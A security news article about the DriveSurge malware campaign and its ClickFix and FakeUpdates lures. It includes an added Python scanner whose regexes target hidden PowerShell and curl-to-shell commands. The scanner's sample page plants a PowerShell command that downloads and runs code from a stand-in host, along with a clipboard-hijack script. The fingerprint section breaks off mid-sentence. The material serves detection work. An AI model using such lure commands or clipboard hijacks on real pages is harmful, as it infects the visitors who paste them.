Introduction to DriveSurge Malware Campaign
A threat actor tracked as DriveSurge has been running large-scale malware distribution campaigns that use ClickFix and FakeUpdates lures on compromised websites. According to researchers at cybersecurity company Silent Push, thousands of websites have been compromised in DriveSurge campaigns to redirect visitors to malware-delivery infrastructure.
ClickFix and FakeUpdates Techniques
ClickFix is a widely used social engineering tactic that tricks victims into copying a malicious command and pasting it into a Run dialog, command prompt or terminal themselves, typically under the pretense of fixing a technical problem or completing a "verify you are human" step; the result is a malware infection that no download prompt or browser warning ever interrupted. In FakeUpdates attacks, threat actors show victims fraudulent software update prompts, usually impersonating browser updates, to get them to download and run a malicious payload.
DriveSurge Threat Actor
According to Silent Push researchers, the DriveSurge threat actor primarily functions as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are redirected through a Traffic Distribution System (TDS) known as zTDS, which profiles them and determines whether a FakeUpdates or a ClickFix lure is more appropriate.
zTDS is an open-source TDS that has existed since at least 2015 and that DriveSurge has been using since at least September 2025. Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites’ owners or their visitors, Silent Push says.
FakeUpdates Lures and ClickFix Attacks
The FakeUpdates lures show bogus update notices for Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser, while the ClickFix attacks get the victim to run PowerShell commands. One case highlighted in the Silent Push report is a fake Firefox update that downloaded a ZIP archive containing multiple DLLs and a malicious executable named ‘Browser Update.exe.’
A fake Firefox update is one of the tactics DriveSurge uses most often to get victims to install malware. The researchers identified eight technical fingerprints linked to the campaign, which they used to identify DriveSurge infrastructure and the websites it has compromised.
Technical Fingerprints and Malicious Injection Domains
Among the technical fingerprints is a JavaScript injection following the ‘t.js?site=
Obfuscated JavaScript Payload and macOS Targeting
The researchers also found an obfuscated JavaScript payload built specifically for macOS desktop systems. It is delivered through verification-themed ClickFix pages that hijack the clipboard, so that the command the victim pastes into Terminal is the one the page planted, which shows that the campaign is not limited to Windows.
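The following scanner is an added example for this article, not Silent Push's tooling or any code from the report. It checks saved page source for the three indicator classes the text describes: an injected script whose URL contains the ‘t.js?site=’ prefix (only that prefix comes from the report; the rest of the URL pattern is not shown on this page, so the scanner matches the prefix alone), inline JavaScript that writes to the clipboard (the ClickFix hijack described above for both Windows and macOS pages), and the kind of hidden or encoded PowerShell, or curl-to-shell, one-liner a ClickFix lure asks the victim to paste. The sample HTML, the domains in it and the planted command string are all constructed for the example; the command-shape regexes are illustrative heuristics, not the campaign's actual commands.

```python
"""Flag DriveSurge-style indicators in saved page source (added example)."""
import re
import sys
from html.parser import HTMLParser

# Only the 't.js?site=' prefix is taken from the report; the remainder of the
# URL is unknown, so the prefix is matched anywhere inside a <script src>.
INJECTION_SRC = re.compile(r"t\.js\?site=", re.IGNORECASE)

# Clipboard writes a ClickFix page uses to plant the command the victim pastes.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*['\"]copy['\"]",
    re.IGNORECASE,
)

# Typical ClickFix command shapes (illustrative, not exhaustive): PowerShell
# with a hidden window, an encoded command or a download-and-run verb on
# Windows; a curl-to-shell pipe on macOS.
LURE_COMMAND = re.compile(
    r"powershell(?:\.exe)?[^\n<]*?"
    r"(?:-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|\biex\b|\birm\b"
    r"|invoke-expression|downloadstring)"
    r"|\bcurl\s[^\n<]*?\|\s*(?:ba|z)?sh\b",
    re.IGNORECASE,
)


class _PageScanner(HTMLParser):
    """Collects (indicator_kind, detail) tuples while walking the HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        self._script_buf = []
        src = dict(attrs).get("src") or ""
        if INJECTION_SRC.search(src):
            self.findings.append(("injected_script", src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)  # script bodies arrive as one chunk
        elif LURE_COMMAND.search(data):
            # Lure text shown to the victim outside any <script> element.
            self.findings.append(("lure_command", data.strip()))

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        body = "".join(self._script_buf)
        if CLIPBOARD_WRITE.search(body):
            self.findings.append(("clipboard_write", body.strip()[:80]))
        if LURE_COMMAND.search(body):
            self.findings.append(("lure_command", body.strip()[:80]))


def scan_html(html):
    """Return every indicator found in the page as (kind, detail) tuples."""
    scanner = _PageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def indicator_kinds(html):
    """Sorted, de-duplicated indicator kinds, convenient for triage rules."""
    return sorted({kind for kind, _ in scan_html(html)})


# Constructed sample: a page carrying an injected loader plus a ClickFix lure.
# Domains, markup and the planted command are invented for this example.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example/lib/jquery.min.js"></script>
<script src="https://cdn.example-injected.test/t.js?site=victim.example"></script>
</head><body>
<div id="verify">Press Win+R, then Ctrl+V and Enter to verify you are human.</div>
<script>
  var cmd = 'powershell -w hidden -c "iex (irm https://lure.example/x)"';
  document.getElementById('verify').onclick = function () {
    navigator.clipboard.writeText(cmd);
  };
</script>
</body></html>"""

# Constructed benign page for comparison.
CLEAN_HTML = """<html><head><script src="/static/app.js"></script></head>
<body><p>Firefox updates ship through Help &gt; About Firefox.</p></body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            page = fh.read()
    else:
        page = SAMPLE_HTML
    for kind, detail in scan_html(page):
        print(f"{kind}: {detail}")
```

Run it against HTML saved with curl or a crawler (the page as served to a browser-like User-Agent, since the TDS profiles visitors before deciding what to serve). A clipboard write on its own is common on legitimate "copy to clipboard" buttons, so treat the combination of an injected loader, a clipboard write and a PowerShell or curl-to-shell string as the signal, not any single hit.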
Recommendations for Users
Users should obtain browser updates only through the browser's own settings menu (About > Check for Updates) rather than from a pop-up on a website, and should never paste commands they do not fully understand into the Windows Run dialog, command prompt, PowerShell or Terminal. No legitimate update or human-verification step requires running a command by hand.
Source: BleepingComputer